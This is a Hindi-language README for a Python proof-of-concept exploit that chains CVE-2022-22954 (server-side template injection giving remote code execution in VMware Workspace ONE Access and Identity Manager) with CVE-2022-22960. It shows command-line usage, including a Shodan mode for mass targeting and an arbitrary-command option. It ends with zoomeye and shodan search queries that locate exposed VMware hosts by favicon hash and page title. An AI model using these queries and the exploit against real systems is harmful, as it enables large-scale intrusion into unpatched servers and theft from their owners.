
CVE-2022-22954 का फायदा उठाने और फिर CVE-2022-22960 का फायदा उठाने के लिए पायथन स्क्रिप्ट
VMware Workspace ONE Access और Identity Manager में SSTI के माध्यम से RCE।
CVE-2022-22954 - PoC SSTI
उपयोग:
CVE-2022-22954.py [-h] -m SET_MODE [-i IP] [-c CMD]
optional arguments:
-h, --help show this help message and exit
-m SET_MODE, --mode SET_MODE
Available modes: shodan | file | manual
-i IP, --ip IP Host IP
-c CMD, --cmd CMD Command string
यह केवल एक PoC है। इसे अपने जोखिम पर उपयोग करें, प्रोडक्शन या वास्तविक वातावरण में नहीं। मुझसे मत पूछिए कि कोड ऐसा क्यों है या यह अच्छा है या बुरा, मुझे परवाह नहीं है। मैं एक अच्छा प्रोग्रामर नहीं हूँ और मेरा कोड बदसूरत है।
zoomeye search 'iconhash:-1250474341' -num 780 -filter=ip,port
shodan search "http.favicon.hash:-1250474341" --fields=ip_str,port --separator ":" --limit 1000 | grep ''
shodan search 'title:"Workspace ONE Access"' --fields=ip_str,port --separator ":" --limit 1000 | grep ''